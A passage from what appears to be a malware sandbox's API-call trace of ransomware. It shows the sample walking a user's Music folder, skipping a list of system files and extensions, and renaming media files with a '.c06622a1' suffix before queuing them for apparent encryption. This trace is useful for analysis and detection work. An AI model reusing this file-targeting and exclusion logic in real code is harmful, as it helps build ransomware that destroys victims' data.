ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.738] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27f7e12e [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4825c82 [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1df6742a [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x602af8b4 [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d3cfe5e [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x673b9aca [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b46315e [0150.743] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b1be7fc [0150.746] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x6777a552 [0150.746] RtlComputeCrc32 (PartialCrc=0xa552, Buffer=0x4940094, Length=0x80) returned 0x5a6eefa [0150.746] RtlComputeCrc32 (PartialCrc=0xeefa, Buffer=0x4940094, Length=0x80) returned 0x170efa88 [0150.746] RtlComputeCrc32 (PartialCrc=0xfa88, Buffer=0x4940094, Length=0x80) returned 0x24b3c0ee [0150.746] RtlComputeCrc32 (PartialCrc=0xc0ee, Buffer=0x4940094, Length=0x80) returned 0x79b0cece [0150.746] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0150.747] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45c00f0) returned 1 [0150.747] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45d00f8) returned 1 [0150.747] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd86e8800, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd86e8800, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd86e8800, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.747] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.747] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3d9c4a0, ftCreationTime.dwHighDateTime=0x1d5d96d, ftLastAccessTime.dwLowDateTime=0x3eb23020, ftLastAccessTime.dwHighDateTime=0x1d5e1ab, ftLastWriteTime.dwLowDateTime=0x3eb23020, ftLastWriteTime.dwHighDateTime=0x1d5e1ab, nFileSizeHigh=0x0, nFileSizeLow=0x156ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="TPy1D.mp3", cAlternateFileName="")) returned 1 [0150.747] _wcsicmp (_Str1="TPy1D.mp3", _Str2="README.c06622a1.TXT") returned 2 [0150.747] wcsstr (_Str="TPy1D.mp3", _SubStr="README") returned 0x0 [0150.747] _wcsicmp (_Str1="autorun.inf", _Str2="TPy1D.mp3") returned -19 [0150.747] wcslen (_String="autorun.inf") returned 0xb [0150.747] _wcsicmp (_Str1="boot.ini", _Str2="TPy1D.mp3") returned -18 [0150.747] wcslen (_String="boot.ini") returned 0x8 [0150.747] _wcsicmp (_Str1="bootfont.bin", _Str2="TPy1D.mp3") returned -18 [0150.747] wcslen (_String="bootfont.bin") returned 0xc [0150.747] _wcsicmp (_Str1="bootsect.bak", _Str2="TPy1D.mp3") returned -18 [0150.747] wcslen (_String="bootsect.bak") returned 0xc [0150.747] _wcsicmp (_Str1="desktop.ini", _Str2="TPy1D.mp3") returned -16 [0150.747] wcslen (_String="desktop.ini") returned 0xb [0150.747] _wcsicmp (_Str1="iconcache.db", _Str2="TPy1D.mp3") returned -11 [0150.747] wcslen (_String="iconcache.db") returned 0xc [0150.747] _wcsicmp (_Str1="ntldr", _Str2="TPy1D.mp3") returned -6 [0150.747] wcslen (_String="ntldr") returned 0x5 [0150.747] _wcsicmp (_Str1="ntuser.dat", _Str2="TPy1D.mp3") returned -6 [0150.747] wcslen (_String="ntuser.dat") returned 0xa [0150.747] _wcsicmp (_Str1="ntuser.dat.log", _Str2="TPy1D.mp3") returned -6 [0150.747] wcslen (_String="ntuser.dat.log") returned 0xe [0150.747] _wcsicmp (_Str1="ntuser.ini", _Str2="TPy1D.mp3") returned -6 [0150.747] wcslen (_String="ntuser.ini") returned 0xa [0150.747] _wcsicmp (_Str1="thumbs.db", _Str2="TPy1D.mp3") returned -8 [0150.747] wcslen (_String="thumbs.db") returned 0x9 [0150.747] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0150.747] wcslen (_String="386") returned 0x3 [0150.747] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0150.747] wcslen (_String="adv") returned 0x3 [0150.747] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0150.748] wcslen (_String="ani") returned 0x3 [0150.748] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0150.748] wcslen (_String="bat") returned 0x3 [0150.748] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0150.748] wcslen (_String="bin") returned 0x3 [0150.748] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0150.748] wcslen (_String="cab") returned 0x3 [0150.748] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0150.748] wcslen (_String="cmd") returned 0x3 [0150.748] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0150.748] wcslen (_String="com") returned 0x3 [0150.748] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0150.748] wcslen (_String="cpl") returned 0x3 [0150.748] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0150.748] wcslen (_String="cur") returned 0x3 [0150.748] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0150.748] wcslen (_String="deskthemepack") returned 0xd [0150.748] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0150.748] wcslen (_String="diagcab") returned 0x7 [0150.748] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0150.748] wcslen (_String="diagcfg") returned 0x7 [0150.748] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0150.748] wcslen (_String="diagpkg") returned 0x7 [0150.748] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0150.748] wcslen (_String="dll") returned 0x3 [0150.748] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0150.748] wcslen (_String="drv") returned 0x3 [0150.748] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0150.748] wcslen (_String="exe") returned 0x3 [0150.748] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0150.748] wcslen (_String="hlp") returned 0x3 [0150.748] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0150.748] wcslen (_String="icl") returned 0x3 [0150.748] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0150.748] wcslen (_String="icns") returned 0x4 [0150.748] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0150.748] wcslen (_String="ico") returned 0x3 [0150.749] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0150.749] wcslen (_String="ics") returned 0x3 [0150.749] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0150.749] wcslen (_String="idx") returned 0x3 [0150.749] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0150.749] wcslen (_String="ldf") returned 0x3 [0150.749] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0150.749] wcslen (_String="lnk") returned 0x3 [0150.749] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0150.749] wcslen (_String="mod") returned 0x3 [0150.749] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0150.749] wcslen (_String="mpa") returned 0x3 [0150.749] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0150.749] wcslen (_String="msc") returned 0x3 [0150.749] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0150.749] wcslen (_String="msp") returned 0x3 [0150.749] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0150.749] wcslen (_String="msstyles") returned 0x8 [0150.749] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0150.749] wcslen (_String="msu") returned 0x3 [0150.749] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0150.749] wcslen (_String="nls") returned 0x3 [0150.749] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0150.749] wcslen (_String="nomedia") returned 0x7 [0150.749] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0150.749] wcslen (_String="ocx") returned 0x3 [0150.749] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0150.749] wcslen (_String="prf") returned 0x3 [0150.749] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0150.749] wcslen (_String="ps1") returned 0x3 [0150.749] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0150.749] wcslen (_String="rom") returned 0x3 [0150.749] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0150.749] wcslen (_String="rtp") returned 0x3 [0150.749] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0150.749] wcslen (_String="scr") returned 0x3 [0150.749] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0150.749] wcslen (_String="shs") returned 0x3 [0150.750] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0150.750] wcslen (_String="spl") returned 0x3 [0150.750] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0150.750] wcslen (_String="sys") returned 0x3 [0150.750] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0150.750] wcslen (_String="theme") returned 0x5 [0150.750] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0150.750] wcslen (_String="themepack") returned 0x9 [0150.750] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0150.750] wcslen (_String="wpx") returned 0x3 [0150.750] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0150.750] wcslen (_String="lock") returned 0x4 [0150.750] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0150.750] wcslen (_String="key") returned 0x3 [0150.750] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0150.750] wcslen (_String="hta") returned 0x3 [0150.750] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0150.750] wcslen (_String="msi") returned 0x3 [0150.750] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0150.750] wcslen (_String="pdb") returned 0x3 [0150.750] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0150.750] wcslen (_String="sql") returned 0x3 [0150.750] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0150.750] wcslen (_String="sqlite") returned 0x6 [0150.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.750] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45c00f0 [0150.750] wcscpy (in: _Dest=0x45c00f0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.750] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned 0x71 [0150.750] wcscpy (in: _Dest=0x45c01d4, _Source="TPy1D.mp3" | out: _Dest="TPy1D.mp3") returned="TPy1D.mp3" [0150.750] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3", dwFileAttributes=0x80) returned 1 [0150.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\tpy1d.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0150.759] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.759] ReadFile (in: hFile=0x65c, lpBuffer=0x3fdef4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fdf84, lpOverlapped=0x0 | out: lpBuffer=0x3fdef4*, lpNumberOfBytesRead=0x3fdf84*=0x90, lpOverlapped=0x0) returned 1 [0150.760] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fdef4, Length=0x80) returned 0xb3337637 [0150.760] RtlComputeCrc32 (PartialCrc=0x7637, Buffer=0x3fdef4, Length=0x80) returned 0x821dd9be [0150.760] RtlComputeCrc32 (PartialCrc=0xd9be, Buffer=0x3fdef4, Length=0x80) returned 0x31730ea8 [0150.761] RtlComputeCrc32 (PartialCrc=0xea8, Buffer=0x3fdef4, Length=0x80) returned 0x91d134af [0150.761] RtlComputeCrc32 (PartialCrc=0x34af, Buffer=0x3fdef4, Length=0x80) returned 0x6c911b [0150.761] CloseHandle (hObject=0x65c) returned 1 [0150.761] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45d00f8 [0150.761] wcscpy (in: _Dest=0x45d00f8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3" [0150.761] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3") returned 0x7b [0150.761] wcscpy (in: _Dest=0x45d01ee, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.761] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\tpy1d.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\tpy1d.mp3.c06622a1"), dwFlags=0x8) returned 1 [0150.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\TPy1D.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\tpy1d.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0150.766] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.766] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e8bd8ad [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x67703ca4 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x56ba96b9 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x276feca9 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c42c5cd [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60cf522 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d480843 [0150.773] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x707ea9d1 [0150.776] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x53ae61e7 [0150.776] RtlComputeCrc32 (PartialCrc=0x61e7, Buffer=0x49d0094, Length=0x80) returned 0x90c8ecdf [0150.776] RtlComputeCrc32 (PartialCrc=0xecdf, Buffer=0x49d0094, Length=0x80) returned 0xc409d7cf [0150.776] RtlComputeCrc32 (PartialCrc=0xd7cf, Buffer=0x49d0094, Length=0x80) returned 0x5025db5d [0150.777] RtlComputeCrc32 (PartialCrc=0xdb5d, Buffer=0x49d0094, Length=0x80) returned 0x6688f82d [0150.777] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0150.777] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45c00f0) returned 1 [0150.777] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45d00f8) returned 1 [0150.777] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x692494a0, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0x81fdb160, ftLastAccessTime.dwHighDateTime=0x1d5e2e6, ftLastWriteTime.dwLowDateTime=0x81fdb160, ftLastWriteTime.dwHighDateTime=0x1d5e2e6, nFileSizeHigh=0x0, nFileSizeLow=0x510f, dwReserved0=0x0, dwReserved1=0x0, cFileName="YK12.m4a", cAlternateFileName="")) returned 1 [0150.777] _wcsicmp (_Str1="YK12.m4a", _Str2="README.c06622a1.TXT") returned 7 [0150.777] wcsstr (_Str="YK12.m4a", _SubStr="README") returned 0x0 [0150.777] _wcsicmp (_Str1="autorun.inf", _Str2="YK12.m4a") returned -24 [0150.777] wcslen (_String="autorun.inf") returned 0xb [0150.777] _wcsicmp (_Str1="boot.ini", _Str2="YK12.m4a") returned -23 [0150.777] wcslen (_String="boot.ini") returned 0x8 [0150.777] _wcsicmp (_Str1="bootfont.bin", _Str2="YK12.m4a") returned -23 [0150.777] wcslen (_String="bootfont.bin") returned 0xc [0150.777] _wcsicmp (_Str1="bootsect.bak", _Str2="YK12.m4a") returned -23 [0150.777] wcslen (_String="bootsect.bak") returned 0xc [0150.777] _wcsicmp (_Str1="desktop.ini", _Str2="YK12.m4a") returned -21 [0150.777] wcslen (_String="desktop.ini") returned 0xb [0150.777] _wcsicmp (_Str1="iconcache.db", _Str2="YK12.m4a") returned -16 [0150.777] wcslen (_String="iconcache.db") returned 0xc [0150.777] _wcsicmp (_Str1="ntldr", _Str2="YK12.m4a") returned -11 [0150.777] wcslen (_String="ntldr") returned 0x5 [0150.777] _wcsicmp (_Str1="ntuser.dat", _Str2="YK12.m4a") returned -11 [0150.777] wcslen (_String="ntuser.dat") returned 0xa [0150.777] _wcsicmp (_Str1="ntuser.dat.log", _Str2="YK12.m4a") returned -11 [0150.778] wcslen (_String="ntuser.dat.log") returned 0xe [0150.778] _wcsicmp (_Str1="ntuser.ini", _Str2="YK12.m4a") returned -11 [0150.778] wcslen (_String="ntuser.ini") returned 0xa [0150.778] _wcsicmp (_Str1="thumbs.db", _Str2="YK12.m4a") returned -5 [0150.778] wcslen (_String="thumbs.db") returned 0x9 [0150.778] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.778] wcslen (_String="386") returned 0x3 [0150.778] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.778] wcslen (_String="adv") returned 0x3 [0150.778] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.778] wcslen (_String="ani") returned 0x3 [0150.778] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.778] wcslen (_String="bat") returned 0x3 [0150.778] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.778] wcslen (_String="bin") returned 0x3 [0150.778] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.778] wcslen (_String="cab") returned 0x3 [0150.778] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.778] wcslen (_String="cmd") returned 0x3 [0150.778] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.778] wcslen (_String="com") returned 0x3 [0150.778] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.778] wcslen (_String="cpl") returned 0x3 [0150.778] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.778] wcslen (_String="cur") returned 0x3 [0150.778] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.779] wcslen (_String="deskthemepack") returned 0xd [0150.779] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.779] wcslen (_String="diagcab") returned 0x7 [0150.779] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.779] wcslen (_String="diagcfg") returned 0x7 [0150.779] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.779] wcslen (_String="diagpkg") returned 0x7 [0150.779] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.779] wcslen (_String="dll") returned 0x3 [0150.779] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.779] wcslen (_String="drv") returned 0x3 [0150.779] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.779] wcslen (_String="exe") returned 0x3 [0150.779] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.779] wcslen (_String="hlp") returned 0x3 [0150.779] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.779] wcslen (_String="icl") returned 0x3 [0150.779] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.779] wcslen (_String="icns") returned 0x4 [0150.779] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.779] wcslen (_String="ico") returned 0x3 [0150.779] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.779] wcslen (_String="ics") returned 0x3 [0150.779] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.779] wcslen (_String="idx") returned 0x3 [0150.779] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.780] wcslen (_String="ldf") returned 0x3 [0150.780] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.780] wcslen (_String="lnk") returned 0x3 [0150.780] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.780] wcslen (_String="mod") returned 0x3 [0150.780] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.780] wcslen (_String="mpa") returned 0x3 [0150.780] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.780] wcslen (_String="msc") returned 0x3 [0150.780] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.780] wcslen (_String="msp") returned 0x3 [0150.780] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.780] wcslen (_String="msstyles") returned 0x8 [0150.780] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.780] wcslen (_String="msu") returned 0x3 [0150.780] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.780] wcslen (_String="nls") returned 0x3 [0150.780] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.780] wcslen (_String="nomedia") returned 0x7 [0150.780] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.780] wcslen (_String="ocx") returned 0x3 [0150.780] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.780] wcslen (_String="prf") returned 0x3 [0150.780] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.780] wcslen (_String="ps1") returned 0x3 [0150.780] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.780] wcslen (_String="rom") returned 0x3 [0150.781] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.781] wcslen (_String="rtp") returned 0x3 [0150.781] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.781] wcslen (_String="scr") returned 0x3 [0150.781] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.781] wcslen (_String="shs") returned 0x3 [0150.781] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.781] wcslen (_String="spl") returned 0x3 [0150.781] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.781] wcslen (_String="sys") returned 0x3 [0150.781] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.781] wcslen (_String="theme") returned 0x5 [0150.781] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.781] wcslen (_String="themepack") returned 0x9 [0150.781] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.781] wcslen (_String="wpx") returned 0x3 [0150.781] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.781] wcslen (_String="lock") returned 0x4 [0150.781] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.781] wcslen (_String="key") returned 0x3 [0150.781] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.781] wcslen (_String="hta") returned 0x3 [0150.781] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.781] wcslen (_String="msi") returned 0x3 [0150.781] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.781] wcslen (_String="pdb") returned 0x3 [0150.782] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.782] wcslen (_String="sql") returned 0x3 [0150.782] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.782] wcslen (_String="sqlite") returned 0x6 [0150.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm 